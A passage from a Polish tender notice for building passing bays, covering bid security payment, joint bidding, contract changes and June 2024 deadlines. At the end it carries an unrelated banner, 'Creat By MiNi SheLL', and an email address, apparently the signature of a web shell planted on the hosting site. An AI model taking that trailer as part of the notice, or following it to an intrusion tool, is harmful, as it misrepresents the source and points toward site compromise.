pkt. 2 ustawy z dnia 9 listopada 2000r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. z 2020 r. poz. 299).<br/>11.4. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności<br/>wadium albo jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>11.5 Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w PNB Paribas S.A. nr rachunku: 28 1600 1462 1016 7882 3000 0001 z dopiskiem na przelewie: „Wadium w postępowaniu nr SA.270.8.2024 – budowa mijanek”.<br/>11.6. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym<br/>Zamawiającego przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny<br/>termin składania ofert). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu polegać na zdolnościach<br/>technicznych lub zawodowych (warunki wskazane w pkt 7.1.) innych podmiotów, niezależnie od charakteru prawnego<br/>łączących go z nimi stosunków prawnych.<br/>Wykonawca, który polega na zdolnościach technicznych lub zawodowych (warunki wskazane w pkt 7.1.) podmiotów<br/>udostępniających zasoby, składa wraz z ofertą:<br/>1) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa wyżej, potwierdza, że stosunek łączący Wykonawcę z<br/>podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: (1)<br/>zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby; (2) sposób i okres udostępnienia wykonawcy i<br/>wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; (3) czy i w jakim<br/>zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w<br/>postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane<br/>zdolności dotyczą. Niewiążący wzór zobowiązania do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>wykonania zamówienia stanowi załącznik nr 6 do SWZ.<br/>2) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>spełnienie warunków udziału w postępowaniu (w zakresie warunku, w stosunku do którego udostępnia swój potencjał) na<br/>zaproponowanych oświadczeniach, o których mowa 9.2.<br/>-Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>-W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale 9 pkt 9.2. SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>-Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty wykonają poszczególni wykonawcy.<br/>-Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego zawiera wzór umowy stanowiący załącznik nr 10<br/>do SWZ.<br/>Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający przewiduje możliwość zmian postanowień<br/>zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia<br/>co najmniej jednej z okoliczności w niej wymienionych z uwzględnieniem podanych we wzorze umowy warunków ich<br/>wprowadzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lasy_hajnowka</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-17 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com